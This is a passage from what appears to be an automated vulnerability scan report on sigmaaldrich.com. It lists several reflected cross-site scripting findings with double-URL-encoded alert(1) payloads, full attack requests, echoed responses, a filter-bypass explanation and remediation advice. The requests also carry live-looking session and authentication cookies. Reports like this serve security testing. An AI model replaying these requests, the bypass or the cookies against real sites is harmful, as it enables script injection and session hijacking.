Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc8a2d2";alert(1)//7d7bae8e9ef/medialib/labware/labware-icons/stirrers","E404") ;
   </script>
...[SNIP]...

1.399. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/stirrers [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/stirrers

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c22a1%2522%253balert%25281%2529%252f%252feafda1049fa was submitted in the REST URL parameter 2. This input was echoed as c22a1";alert(1)//eafda1049fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibc22a1%2522%253balert%25281%2529%252f%252feafda1049fa/labware/labware-icons/stirrers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibc22a1";alert(1)//eafda1049fa/labware/labware-icons/stirrers","E404") ;
   </script>
...[SNIP]...

1.400. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/stirrers [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/stirrers

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff1f7%2522%253balert%25281%2529%252f%252f657b7725398 was submitted in the REST URL parameter 3. This input was echoed as ff1f7";alert(1)//657b7725398 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwareff1f7%2522%253balert%25281%2529%252f%252f657b7725398/labware-icons/stirrers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwareff1f7";alert(1)//657b7725398/labware-icons/stirrers","E404") ;
   </script>
...[SNIP]...

1.401. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/stirrers [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/stirrers

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b70e%2522%253balert%25281%2529%252f%252fd1588ba2e3b was submitted in the REST URL parameter 4. This input was echoed as 3b70e";alert(1)//d1588ba2e3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons3b70e%2522%253balert%25281%2529%252f%252fd1588ba2e3b/stirrers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons3b70e";alert(1)//d1588ba2e3b/stirrers","E404") ;
   </script>
...[SNIP]...

1.402. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/stirrers [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/stirrers

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1396%2522%253balert%25281%2529%252f%252f150ae0e8384 was submitted in the REST URL parameter 5. This input was echoed as c1396";alert(1)//150ae0e8384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/stirrersc1396%2522%253balert%25281%2529%252f%252f150ae0e8384 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:08 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/stirrersc1396";alert(1)//150ae0e8384","E404") ;
   </script>
...[SNIP]...

1.403. http://www.sigmaaldrich.com/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3998f%2522%253balert%25281%2529%252f%252ffed13c53a9e was submitted in the REST URL parameter 1. This input was echoed as 3998f";alert(1)//fed13c53a9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc3998f%2522%253balert%25281%2529%252f%252ffed13c53a9e/medialib/life-science/yfg-detail-page-jpg/yfg-go-new HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
